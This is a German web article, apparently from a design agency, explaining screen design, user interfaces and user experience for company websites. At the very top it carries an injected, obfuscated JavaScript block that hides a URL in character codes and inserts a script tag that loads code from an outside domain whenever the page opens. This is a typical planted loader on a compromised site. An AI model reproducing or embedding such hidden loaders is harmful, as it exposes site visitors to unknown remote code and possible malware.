var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

Was ist Screendesign?

Screendesign: So gestaltet man erfolgreiche Unternehmens-Webseiten
von RHKD 6 Jahren
Startseite  /  Was ist …  /  Was ist Screendesign?

Fin­den wir uns damit ab: Das Inter­net hat uns zu Nut­zern mit der Auf­merk­sam­keits­span­ne eines Ein­mach­gla­ses gemacht. Wenn uns eine Sei­te die gesuch­ten Infor­ma­tio­nen nicht in leicht ver­dau­li­chen Häpp­chen ser­viert, zie­hen wir sofort belei­digt ab.

Jetzt könn­ten wir natür­lich den Unter­gang des Abend­lan­des bekla­gen. Oder wir spre­chen dar­über, wie Sie mit cle­ve­rem Web­de­sign eine User Expe­ri­ence schaf­fen, die den Nut­zer mög­lichst lan­ge auf Ihrer Web­site hält.

Wozu Screendesign?

Vom User Inter­face zur User Experience

War­um benut­zen wir das Inter­net über­haupt? Mal abge­se­hen von kos­ten­lo­sen Schmud­del­film­chen wol­len wir schnell rele­van­te Infor­ma­tio­nen fin­den. Und das mög­lichst spie­le­risch und intuitiv.

Dazu brau­chen wir eine leicht nach­voll­zieh­ba­re Web­sei­ten-Struk­tur, das User Inter­face. Wenn das Screen­de­sign stimmt, fin­den wir die gesuch­te Infor­ma­ti­on nicht nur ein­fach, son­dern auch in ganz weni­gen Schrit­ten. Und der Nut­zer ist glück­lich, wenn das Screen­de­sign mög­lichst vie­le Klicks und mög­lichst weni­ge Ein­ga­ben bie­tet. Mit ande­ren Wor­ten: Die User Expe­ri­ence ist gelungen.

Beim Web­de­sign geht es also weni­ger um den Lese­fluss eines Tex­tes, son­dern um den Bewe­gungs­fluss bei der Inter­ak­ti­on mit dem User Inter­face. Die­se Inter­ak­ti­on soll eine gelun­ge­ne User Expe­ri­ence schaf­fen, und dies auf allen End­ge­rä­ten gleichsam.

Nutzerfreundliches Screendesign und Webdesign

Die Eich­hörn­chen-For­mel

Dass der gemei­ne Netz-Nut­zer prak­tisch ADS im End­sta­di­um hat, haben wir ja schon geklärt. Um her­aus­zu­fin­den, ob Ihr Screen­de­sign funk­tio­niert und ob Ihr User Inter­face gelun­gen ist, soll­ten Sie immer die Eich­hörn­chen-For­mel im Hin­ter­kopf haben: Sobald ein Ele­ment Ihres Screen­de­signs zu lang­wei­lig, kom­pli­ziert oder sinn­los ist, jagt der Nut­zer lie­ber das Eich­hörn­chen. Sprich: Er surft schnell wei­ter zur nächs­ten Website.

Auch wenn es mit der Auf­merk­sam­keit hapert, ist der Nut­zer nicht bescheu­ert. Wenn Ihr Screen­de­sign nicht zu Ihrer Cor­po­ra­te Iden­ti­ty passt, nimmt der Nut­zer Ihre Web­site nicht ernst. Wenn Sie ver­su­chen, damit etwas dar­zu­stel­len, was Sie nicht sind, bestraft der Nut­zer Sie mit Nicht­ach­tung oder zer­legt Sie als abschre­cken­des Bei­spiel für schlech­tes Web­de­sign in sei­nem pri­va­ten Blog.

Abge­se­hen vom Aus­se­hen bedeu­tet ein sinn­vol­les User Inter­face und eine durch­dach­te User Expe­ri­ence ein auf­ge­räum­tes und über­sicht­li­ches Web­de­sign. Kate­go­rien sind gut geglie­dert, Tex­te nicht zu lang und optisch auf­ge­lo­ckert. Dar­über hin­aus nimmt gutes Screen­de­sign den Nut­zer an der Hand und führt ihn sicher durchs User Inter­face. Quer­ver­wei­se und Links sind nicht irgend­wo auf einem Hau­fen ver­steckt, son­dern genau dort ein­ge­fügt, wo sie the­ma­tisch pas­sen. Alle Unter­ka­te­go­rien sind durch ein stra­te­gi­sches Web­de­sign von über­all zu erreichen.

Wenn die­se grund­sätz­li­chen Funk­ti­on, also Über­sicht­lich­keit und Ein­fach­heit, in Ihrem Screen­de­sign umge­setzt sind, kön­nen Sie die User Expe­ri­ence noch erleb­nis­rei­cher und gelun­ge­ner gestal­ten. Weil der Nut­zer im Inter­net nichts anfas­sen kann, will er beim Web­de­sign umso mehr hören und sehen. Geben Sie ihm also etwas zu gucken! Bil­der lockern und struk­tu­rie­ren gleich­zei­tig jedes Screen­de­sign auf und sagen bekannt­lich mehr als 1.000 Wor­te. Wenn es passt, fügen Sie unbe­dingt Pro­dukt- oder Image­vi­de­os ein.

Gutes Web­de­sign und nut­zer­freund­li­ches Screen­de­sign heißt auch: Wenig tip­pen und viel kli­cken. Mit Sym­bo­len ver­ein­fa­chen Sie Such­vor­gän­ge und die Ver­lin­kung. Jedes Kind kennt das blaue Facebook‑F, der Ver­weis zur Fan­sei­te braucht also nur einen But­ton. Vor­ein­ge­stell­te For­mu­la­re, bei denen der Benut­zer nicht vie­le Anga­ben ein­tip­pen oder wie­der­ho­len muss, gehö­ren zu einem guten User Interface.

Schwirrt Ihnen eigent­lich schon der Kopf? Kein Wun­der, denn Web­de­sign ist eine ästhe­ti­sche und tech­nisch kom­pli­zier­te Ange­le­gen­heit, bei der Sie sich mit User Inter­faces nicht nur theo­re­tisch aus­ken­nen müs­sen. Ein ent­spre­chend aus­ge­bil­de­ter Desi­gner schafft es auch, dass Ihr Screen­de­sign auf jedem End­ge­rät glei­cher­ma­ßen gut zur Gel­tung kommt und sorgt für einen dyna­misch ange­pass­ten Seitenverlauf.

Kategorie:
  Was ist …
Artikel per Email verschicken